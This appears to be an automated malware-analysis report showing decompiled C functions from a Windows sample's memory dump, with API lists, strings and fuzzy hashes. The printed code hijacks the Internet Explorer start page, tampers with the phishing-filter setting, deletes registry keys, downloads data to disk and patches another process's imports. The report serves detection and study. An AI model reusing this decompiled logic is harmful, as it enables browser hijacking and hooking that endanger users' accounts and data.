    0x00000000
    0x0040fc31
    0x0040fc3a
    0x00000000
    0x00000000
    0x00000000
    0x0040fc3c
    0x0040fc4c
    0x00000000

    APIs
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040FBBA
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FBE8
    • InternetReadFile.WININET(?,?,00001000,?), ref: 0040FC04
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040FC1F
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040FC3F
    • CloseHandle.KERNEL32(00000000), ref: 0040FC52
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: c39ce7f2de3f4c25de898d7d9cacf3c55dfb10dde89a6287c3ea6ce4aec96b7f
    • Instruction ID: b5af9db788a71a6e6428aa27dc1f93b521d8967994e7e37b8eb6b2c546f22829
    • Opcode Fuzzy Hash: c39ce7f2de3f4c25de898d7d9cacf3c55dfb10dde89a6287c3ea6ce4aec96b7f
    • Instruction Fuzzy Hash: F2219A3190821DABEF21AFA0DC89BEF7B79BB00300F148476F911B2590D3399D498B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C046, Relevance: 9.0, APIs: 6, Instructions: 31threadsleepCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040C046() {
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t14;

				SetThreadPriority(GetCurrentThread(), 2);
				_t7 =  *0x416c34; // 0x25df5a8
				_t1 = _t7 + 0x48; // 0x25df739
				SHDeleteKeyA(0x80000001,  *_t1);
				_t9 =  *0x416c34; // 0x25df5a8
				_t2 = _t9 + 0x48; // 0x25df739
				SHDeleteKeyA(0x80000002,  *_t2);
				_t11 =  *0x416c34; // 0x25df5a8
				_t3 = _t11 + 0x4c; // 0x25df979
				SHDeleteKeyA(0x80000002,  *_t3);
				Sleep(0x3e8);
				_t14 =  *0x416c34; // 0x25df5a8
				_t4 = _t14 + 0x2c; // 0x25df908
				return E0040B37A(0,  *_t4, 0xe, 0, 0, 0, 0);
			}







    0x0040c050
    0x0040c056
    0x0040c05b
    0x0040c063
    0x0040c069
    0x0040c06e
    0x0040c077
    0x0040c07d
    0x0040c082
    0x0040c086
    0x0040c091
    0x0040c09d
    0x0040c0a4
    0x0040c0ad

    APIs
    • GetCurrentThread.KERNEL32 ref: 0040C049
    • SetThreadPriority.KERNEL32(00000000,?,00408052), ref: 0040C050
    • SHDeleteKeyA.SHLWAPI(80000001,025DF739,?,00408052), ref: 0040C063
    • SHDeleteKeyA.SHLWAPI(80000002,025DF739,?,00408052), ref: 0040C077
    • SHDeleteKeyA.SHLWAPI(80000002,025DF979,?,00408052), ref: 0040C086
    • Sleep.KERNEL32(000003E8,?,00408052), ref: 0040C091
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
    • String ID:
    • API String ID: 2160410962-0
    • Opcode ID: c4ae525aca6752377e3477fbe9c36b60e04d974f51fd5e05b2ec3d0d45f4112b
    • Instruction ID: 4c33f71e6525441c575576b2bfae318ad90d4fb1b122247d94e0d21d22c115b9
    • Opcode Fuzzy Hash: c4ae525aca6752377e3477fbe9c36b60e04d974f51fd5e05b2ec3d0d45f4112b
    • Instruction Fuzzy Hash: FCF0DA76202510EFD7116BB8FE09ED97B78EB08311B038160FA05D6171DB71C840CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F99D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F99D(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t17;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t17 = 0;
				do {
					_t1 = _t17 + 0x41600c; // 0x41600c
					_t2 = _t17 +  &E00416008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t17 = _t17 + 8;
				} while (_t17 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}










    0x0040f99d
    0x0040f99d
    0x0040f9a3
    0x0040f9a5
    0x0040f9a5
    0x0040f9ba
    0x0040f9be
    0x0040fa02
    0x00000000
    0x0040fa02
    0x0040f9c1
    0x0040f9c3
    0x0040f9c5
    0x0040f9cc
    0x0040f9d3
    0x0040f9d9
    0x0040f9dc
    0x0040f9f0
    0x0040f9f9
    0x0040f9fc
    0x00000000
    0x0040f9fc
    0x0040fa06

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040F9B4
    • InternetSetOptionA.WININET(00000000,00000002,0041600C,00000004), ref: 0040F9D3
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F9F0
    • InternetCloseHandle.WININET(00000000), ref: 0040F9FC
    Strings
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040F9A5, 0040F9B3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-2068255511
    • Opcode ID: 6d299cd18d7c59ad5331e84cf228f0a9d2220adb465006bdc821a976e1cd560d
    • Instruction ID: bbd4bdda369113f68dd0983876b4092ad58bbd27ea3dd6fc07a5e35f6ed57529
    • Opcode Fuzzy Hash: 6d299cd18d7c59ad5331e84cf228f0a9d2220adb465006bdc821a976e1cd560d
    • Instruction Fuzzy Hash: 86F090B2202230BBD73157619C8CDEBAE5DFF8D7A4B028536F659E1091C639C95487F8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FDA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 54%
    			E0040FDA0() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0040F244( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}










    0x0040fdaf
    0x0040fdb1
    0x0040fdb7
    0x0040fdbc
    0x0040fdc4
    0x0040fdcc
    0x0040fdd2
    0x0040fdd9
    0x0040fddf
    0x0040fde0
    0x0040fde3
    0x0040fded
    0x0040fdf2
    0x0040fdf4
    0x0040fdf4
    0x0040fdfa
    0x0040fe10
    0x0040fe10
    0x0040fe12
    0x0040fe16
    0x0040fe16
    0x0040fe20

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040FDB1
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040FDC4
    • FreeLibrary.KERNEL32(?), ref: 0040FE16
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 59002cdd6b136f7c978a6f48142f00abbf8de6bacfef854dba2bf7f4d857cec6
    • Instruction ID: 75c3523cd69fe1abaae31290556416b9431b5aa668fa1441dd3134aa1927a074
    • Opcode Fuzzy Hash: 59002cdd6b136f7c978a6f48142f00abbf8de6bacfef854dba2bf7f4d857cec6
    • Instruction Fuzzy Hash: CF0188B5900254ABCB20ABE8DD849DE7BB8AB04300F2041BEA611F3291D6748F48CB68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040811E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040811E(void* __ecx, char* _a4, int _a8) {
				void* _v8;
				int _t13;

				_t13 = 0;
				_v8 = 0x80000001;
				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
						_t13 = 1;
					}
					RegCloseKey(_v8);
				}
				return _t13;
			}





    0x00408123
    0x0040813b
    0x00408146
    0x00408161
    0x00408163
    0x00408163
    0x00408168
    0x00408168
    0x00408172

    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000001,?,?,00405940,?,00000000,00000001), ref: 0040813E
    • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,00405940,?,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 00408159
    • RegCloseKey.ADVAPI32(?,?,?,00405940,?,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 00408168
    Strings
    • software\microsoft\internet explorer\main, xrefs: 00408135
    • Start Page, xrefs: 00408151
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Start Page$software\microsoft\internet explorer\main
    • API String ID: 1818849710-2333123338
    • Opcode ID: 13f3a19d53cacf50d6b9452804b44b47a7c16c19775eb956d6cb6ec894bcd59b
    • Instruction ID: 4234741d7cd6faba5f5c0ea56d521b5cca715f4bdd2c245c6b6784791d141544
    • Opcode Fuzzy Hash: 13f3a19d53cacf50d6b9452804b44b47a7c16c19775eb956d6cb6ec894bcd59b
    • Instruction Fuzzy Hash: 5DF082B1240208BFEF114FA1CD8AFDF7A6EEB14784F108026B545B5190EAB69E109624
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004122A1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004122A1(void* _a4, short* _a8, char* _a12) {
				int _t12;

				_t12 = 0;
				if(RegCreateKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 0, 0, 2, 0,  &_a4, 0) == 0) {
					if(RegSetValueExW(_a4, _a8, 0, 4, _a12, 4) == 0) {
						_t12 = 1;
					}
					RegCloseKey(_a4);
				}
				return _t12;
			}




    0x004122a5
    0x004122c2
    0x004122da
    0x004122dc
    0x004122dc
    0x004122e1
    0x004122e1
    0x004122eb

    APIs
    • RegCreateKeyExW.ADVAPI32(?,software\microsoft\internet explorer\phishingfilter,00000000,00000000,00000000,00000002,00000000,?,00000000,Enabled,?,00412252,?,?,00000000), ref: 004122BA
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00412252,?,?,00000000,?,?,0040D74F,80000002,EnabledV8), ref: 004122D2
    • RegCloseKey.ADVAPI32(?,?,00412252,?,?,00000000,?,?,0040D74F,80000002,EnabledV8,80000002,EnabledV8,80000002,Enabled,80000001), ref: 004122E1
    Strings
    • Enabled, xrefs: 004122A4
    • software\microsoft\internet explorer\phishingfilter, xrefs: 004122B2
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
    • API String ID: 1818849710-3174912645
    • Opcode ID: bde377fcddaba3b1e3b4744389d5b2b07b14058f5f5ae0935b499ac6792870b3
    • Instruction ID: 8b3b5b3a29cfe43f16c7ae286cee3f57a17c1e910cbdde6df11055293b966cc3
    • Opcode Fuzzy Hash: bde377fcddaba3b1e3b4744389d5b2b07b14058f5f5ae0935b499ac6792870b3
    • Instruction Fuzzy Hash: 69F0C0B124120DBFFB114F50DC85FEB7B6DEB10798F018026FA4895160E672DDA1AA68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00412256, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00412256(void* _a4, short* _a8, int* _a12, char* _a16, int* _a20) {
				int _t14;

				_t14 = 0;
				if(RegOpenKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 1,  &_a4) == 0) {
					if(RegQueryValueExW(_a4, _a8, 0, _a12, _a16, _a20) == 0) {
						_t14 = 1;
					}
					RegCloseKey(_a4);
				}
				return _t14;
			}




    0x00412260
    0x00412273
    0x0041228d
    0x0041228f
    0x0041228f
    0x00412294
    0x00412294
    0x0041229e

    APIs
    • RegOpenKeyExW.ADVAPI32(00000004,software\microsoft\internet explorer\phishingfilter,00000000,00000001,00000004,Enabled,?,00412220,00000004,?,?,00000000,?), ref: 0041226B
    • RegQueryValueExW.ADVAPI32(00000004,?,00000000,?,80000001,0040D704,?,00412220,00000004,?,?,00000000,?), ref: 00412285
    • RegCloseKey.ADVAPI32(00000004,?,00412220,00000004,?,?,00000000,?,?,?,?,0040D704,80000001,Enabled), ref: 00412294
    Strings
    • Enabled, xrefs: 00412259
    • software\microsoft\internet explorer\phishingfilter, xrefs: 00412263
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseOpenQueryValue
    • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
    • API String ID: 3677997916-3174912645
    • Opcode ID: e7d5a1c0cc2566cfaa9f97342214b6649dc028dfc0f2d26adf4cc8dddd368b78
    • Instruction ID: 6689faaf5ff8c86c45ad493251af6b612e9a6c51ca5c6135f26ccca265c6ef9b
    • Opcode Fuzzy Hash: e7d5a1c0cc2566cfaa9f97342214b6649dc028dfc0f2d26adf4cc8dddd368b78
    • Instruction Fuzzy Hash: EFF0C03124121DBFEF014F91DD45EDA3F6DFB14785B008026FD4995120E772D971AB94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004066BC, Relevance: 7.6, APIs: 5, Instructions: 118libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 57%
    			E004066BC(void* __ecx, void* __edx, signed int* _a4) {
				void* __edi;
				void* __esi;
				void** _t13;
				intOrPtr _t16;
				void* _t17;
				char* _t19;
				void* _t23;
				void* _t28;
				void* _t31;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t43;
				signed int* _t45;

				_t41 = __ecx;
				_t43 = __edx;
				if(__ecx == 1) {
					 *_a4 =  *_a4 & 0x00000000;
					return 0x1020702;
				}
				__eflags = __ecx - 2;
				if(__ecx != 2) {
					__eflags = __ecx - 3;
					if(__ecx != 3) {
						__eflags = __ecx - 4;
						if(__ecx != 4) {
							__eflags = __ecx - 5;
							if(__ecx != 5) {
								__eflags = __ecx - 6;
								if(__ecx != 6) {
									__eflags = __ecx - 7;
									if(__ecx != 7) {
										__eflags = __ecx - 8;
										if(__ecx != 8) {
											__eflags = __ecx - 0xa;
											if(__ecx != 0xa) {
												__eflags = __ecx - 9;
												if(__ecx != 9) {
													__eflags = __ecx - 0xb;
													if(__eflags != 0) {
														__eflags = __ecx - 0xc;
														if(__eflags != 0) {
															__eflags = __ecx - 0xd;
															if(__eflags != 0) {
																__eflags = __ecx - 0xe;
																if(__ecx != 0xe) {
																	L6:
																	_t13 = _a4;
																	 *_t13 =  *_t13 & 0x00000000;
																	__eflags =  *_t13;
																	L7:
																	__eflags = 0;
																	return 0;
																}
																 *_a4 =  *_a4 & 0x00000000;
																_t16 =  *0x416c34; // 0x25df5a8
																_t12 = _t16 + 0x68; // 0x25dfba1
																_t17 = GetProcAddress( *0x416e28,  *_t12);
																__eflags = _t17;
																if(_t17 != 0) {
																	 *_t17(0x8007);
																}
																 *((intOrPtr*)(0)) = 0;
																_t19 = 0;
																__eflags = 0;
																L38:
																 *_t19 = 0;
																_t19 = _t19 + 1;
																goto L38;
															}
															_push( *0x4167c4);
															L33:
															E00406690(_t43, _a4, __eflags);
															goto L7;
														}
														_push( *0x4167c0);
														goto L33;
													}
													_push(0x4167d0);
													goto L33;
												}
												 *_a4 =  *_a4 & 0x00000000;
												_t23 =  *0x4169d8; // 0x0
												__eflags = _t23;
												if(_t23 != 0) {
													CloseHandle(_t23);
													 *0x4169d8 =  *0x4169d8 & 0x00000000;
												}
												goto L7;
											}
											_push(0x4167d0);
											_t45 = 0x4169d8;
											L23:
											 *_a4 =  *_a4 & 0x00000000;
											E0040664A(_t41, _t45);
											goto L7;
										}
										 *_a4 =  *_a4 & 0x00000000;
										_t28 =  *0x4169dc; // 0x0
										__eflags = _t28;
										if(_t28 != 0) {
											CloseHandle(_t28);
											 *0x4169dc =  *0x4169dc & 0x00000000;
										}
										goto L7;
									}
									_push( *0x4167c4);
									_t45 = 0x4169dc;
									goto L23;
								}
								 *_a4 =  *_a4 & 0x00000000;
								_t31 =  *0x4167cc; // 0x0
								__eflags = _t31;
								if(_t31 != 0) {
									CloseHandle(_t31);
									 *0x4167cc =  *0x4167cc & 0x00000000;
								}
								goto L7;
							}
							_push( *0x4167c0);
							_t45 = 0x4167cc;
							goto L23;
						}
						 *_a4 =  *_a4 & 0x00000000;
						_t34 =  *0x416d78; // 0x12fc
						return _t34;
					}
					SetEvent( *0x4167c8);
					goto L6;
				} else {
					 *_a4 =  *_a4 & 0x00000000;
					_t37 =  *0x416c64; // 0x41b000
					_t3 = _t37 + 8; // 0x0
					return  *_t3;
				}
			}
















    0x004066bc
    0x004066c1
    0x004066c6
    0x004066cb
    0x00000000
    0x004066ce
    0x004066d5
    0x004066d8
    0x004066ea
    0x004066ed
    0x00406709
    0x0040670c
    0x0040671b
    0x0040671e
    0x0040672d
    0x00406730
    0x00406751
    0x00406754
    0x00406763
    0x00406766
    0x0040678a
    0x0040678d
    0x004067a9
    0x004067ac
    0x004067d4
    0x004067d7
    0x004067e0
    0x004067e3
    0x004067ed
    0x004067f0
    0x00406805
    0x00406808
    0x004066fb
    0x004066fb
    0x004066fe
    0x004066fe
    0x00406701
    0x00406701
    0x00000000
    0x00406701
    0x00406811
    0x00406814
    0x00406819
    0x00406822
    0x00406828
    0x0040682a
    0x00406831
    0x00406831
    0x00406835
    0x00406837
    0x00406837
    0x00406839
    0x00406839
    0x0040683c
    0x00000000
    0x0040683c
    0x004067f2
    0x004067f8
    0x004067fb
    0x00000000
    0x004067fb
    0x004067e5
    0x00000000
    0x004067e5
    0x004067d9
    0x00000000
    0x004067d9
    0x004067b1
    0x004067b4
    0x004067b9
    0x004067bb
    0x004067c2
    0x004067c8
    0x004067c8
    0x00000000
    0x004067bb
    0x0040678f
    0x00406794
    0x00406799
    0x0040679c
    0x0040679f
    0x00000000
    0x0040679f
    0x0040676b
    0x0040676e
    0x00406773
    0x00406775
    0x00406778
    0x0040677e
    0x0040677e
    0x00000000
    0x00406775
    0x00406756
    0x0040675c
    0x00000000
    0x0040675c
    0x00406735
    0x00406738
    0x0040673d
    0x0040673f
    0x00406742
    0x00406748
    0x00406748
    0x00000000
    0x0040673f
    0x00406720
    0x00406726
    0x00000000
    0x00406726
    0x00406711
    0x00406714
    0x00000000
    0x00406714
    0x004066f5
    0x00000000
    0x004066da
    0x004066dd
    0x004066e0
    0x004066e5
    0x00000000
    0x004066e5

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 00406742
    • CloseHandle.KERNEL32(00000000), ref: 00406778
    • CloseHandle.KERNEL32(00000000), ref: 004067C2
    • GetProcAddress.KERNELBASE(025DFBA1), ref: 00406822
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$AddressProc
    • String ID:
    • API String ID: 4209786425-0
    • Opcode ID: e1aeb340a8536d396eda43a2c093094522188c10f09b03ba90bd26e233cc8a77
    • Instruction ID: 48194baf6da5a5be848e876737b62aa9ebee81e234beece6df1afaa065cd7e52
    • Opcode Fuzzy Hash: e1aeb340a8536d396eda43a2c093094522188c10f09b03ba90bd26e233cc8a77
    • Instruction Fuzzy Hash: CF416C31510201DFDB118F54D890BA637A4EB01369F23803BE507AB6E0C77ADCA19B6E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00407411, Relevance: 7.6, APIs: 5, Instructions: 100COMMON
    Download Yara Rule
    C-Code - Quality: 98%
    			E00407411(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
				long _v8;
				void* __edi;
				intOrPtr* _t24;
				intOrPtr _t25;
				signed short _t26;
				int _t27;
				signed short _t28;
				intOrPtr* _t29;
				signed short _t31;
				int _t32;
				signed short _t34;
				signed short _t37;
				void* _t42;
				signed int _t48;
				void* _t57;

				_t48 = __edx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t24 = _a8;
				if(_a16 != 2) {
					_t25 =  *_t24;
				} else {
					_t25 =  *((intOrPtr*)(_t24 + 0x10));
				}
				if(_t25 != 0) {
					_t42 = _t25 + _a4;
					_t26 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t26;
					if(_t26 == 0) {
						while(1) {
							_t31 =  *_t42;
							__eflags = _t31;
							if(_t31 == 0) {
								break;
							}
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								__eflags = _a16;
								if(_a16 != 0) {
									__eflags = _a16 - 1;
									if(_a16 != 1) {
										goto L18;
									} else {
										__eflags = _t31;
										if(_t31 < 0) {
											goto L18;
										} else {
											_t57 = _t31 + _a4;
											_t34 = VirtualProtectEx( *0x416bbc, _t57, 4, 0x40,  &_v8);
											__eflags = _t34;
											if(_t34 == 0) {
												goto L18;
											} else {
												_t17 = _t57 + 2; // 0x2
												_t48 = _t48 | 0xffffffff;
												_t37 = E0040F547(_t48, _a12, _t48, _t17);
												VirtualProtectEx( *0x416bbc, _t57, 4, _v8,  &_v8);
												__eflags = _t37;
												goto L17;
											}
										}
									}
								} else {
									__eflags = _t31;
									if(_t31 >= 0) {
										goto L18;
									} else {
										__eflags = _a12 - (_t31 & 0x0000ffff);
										goto L17;
									}
								}
							} else {
								__eflags = _t31 - _a12;
								L17:
								if(__eflags != 0) {
									L18:
									_t42 = _t42 + 4;
									_t32 = IsBadHugeReadPtr(_t42, 4);
									__eflags = _t32;
									if(_t32 == 0) {
										continue;
									}
								}
							}
							break;
						}
					}
					_t27 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t27;
					if(_t27 != 0) {
						L26:
						_t28 = 0;
						__eflags = 0;
					} else {
						__eflags =  *_t42 - _t27;
						if( *_t42 == _t27) {
							goto L26;
						} else {
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								_t29 = _a8;
								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
							} else {
								_t53 = _t42;
							}
							_t28 = E0040727B(_t53,  &_a20);
						}
					}
				} else {
					_t28 = 0;
				}
				return _t28;
			}


















    0x00407411
    0x00407414
    0x00407415
    0x0040741d
    0x00407421
    0x00407428
    0x00407423
    0x00407423
    0x00407423
    0x0040742c
    0x00407439
    0x0040743f
    0x00407445
    0x00407447
    0x0040744e
    0x0040744e
    0x00407450
    0x00407452
    0x00000000
    0x00000000
    0x00407458
    0x0040745c
    0x00407463
    0x00407467
    0x00407475
    0x00407479
    0x00000000
    0x0040747b
    0x0040747b
    0x0040747d
    0x00000000
    0x0040747f
    0x00407482
    0x00407494
    0x0040749a
    0x0040749c
    0x00000000
    0x0040749e
    0x004074a1
    0x004074a4
    0x004074aa
    0x004074c1
    0x004074c7
    0x00000000
    0x004074c7
    0x0040749c
    0x0040747d
    0x00407469
    0x00407469
    0x0040746b
    0x00000000
    0x0040746d
    0x00407470
    0x00000000
    0x00407470
    0x0040746b
    0x0040745e
    0x0040745e
    0x004074c9
    0x004074c9
    0x004074cb
    0x004074cd
    0x004074d1
    0x004074d7
    0x004074d9
    0x00000000
    0x00000000
    0x004074d9
    0x004074c9
    0x00000000
    0x0040745c
    0x004074df
    0x004074e3
    0x004074e9
    0x004074eb
    0x00407510
    0x00407510
    0x00407510
    0x004074ed
    0x004074ed
    0x004074ef
    0x00000000
    0x004074f1
    0x004074f1
    0x004074f5
    0x004074fb
    0x00407503
    0x00407503
    0x004074f7
    0x004074f7
    0x004074f7
    0x00407509
    0x00407509
    0x004074ef
    0x0040742e
    0x0040742e
    0x0040742e
    0x00407515

    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 0040743F
    • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 004074D1
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 004074E3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead
    • String ID:
    • API String ID: 2080902951-0
    • Opcode ID: 3a9af85b8dc96e1ac3abd27f37662046b750632d6a60e6b38c3b28e0cc30a482
    • Instruction ID: f88d5b6430bdfd719cc8829ac7db07460b3388dbfe81a5f31416030077102ea4
    • Opcode Fuzzy Hash: 3a9af85b8dc96e1ac3abd27f37662046b750632d6a60e6b38c3b28e0cc30a482
    • Instruction Fuzzy Hash: B2317271A08205BBDF20CF24DC45B9B3BA8AB01358F11447AFA05A72D1D738F901D75A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040CCAF, Relevance: 7.6, APIs: 5, Instructions: 84networksynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E0040CCAF(signed int __eax, void* __ebx, void* __edi) {
				void* __esi;
				signed char _t40;
				signed int _t41;
				void* _t45;
				void* _t62;
				void* _t63;
				signed int _t65;
				void* _t69;
				void* _t70;
				signed char* _t74;

				_t69 = __edi;
				_t62 = __ebx;
				_t74 = __eax * 0x30 +  *0x417024;
				if(( *_t74 & 0x00000001) != 0) {
					WaitForSingleObject(_t74[0x14], 0xffffffff);
					CloseHandle(_t74[0x14]);
				}
				_push(_t62);
				_t63 = 0;
				if(_t74[0x28] > 0) {
					_push(_t69);
					_t70 = 0;
					do {
						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
						_t63 = _t63 + 1;
						_t70 = _t70 + 0x18;
					} while (_t63 < _t74[0x28]);
				}
				E0040F0C0(_t74[0x18]);
				E0040F0C0(_t74[0x24]);
				if(( *_t74 & 0x00000002) != 0) {
					InternetCloseHandle(_t74[0x10]);
					InternetCloseHandle(_t74[0xc]);
					InternetCloseHandle(_t74[8]);
				}
				_t40 =  *_t74;
				if((_t40 & 0x0000000c) != 0) {
					if((_t40 & 0x00000008) != 0) {
						_t47 = _t74[0x2c];
						if(_t74[0x2c] != 0) {
							E0040F0C0( *((intOrPtr*)(_t47 + 0x14)));
						}
					}
					E0040F0C0(_t74[0x2c]);
				}
				_t41 =  *0x417020; // 0x0
				_t74[4] = _t74[4] & 0x00000000;
				if(_t41 <= 0) {
					L18:
					return _t41;
				} else {
					_t65 =  *0x417024; // 0x0
					if(_t74 != _t41 * 0x30 + _t65 - 0x30) {
						goto L18;
					} else {
						if(_t41 != 1) {
							_t42 = _t41 - 1;
							 *0x417020 = _t41 - 1;
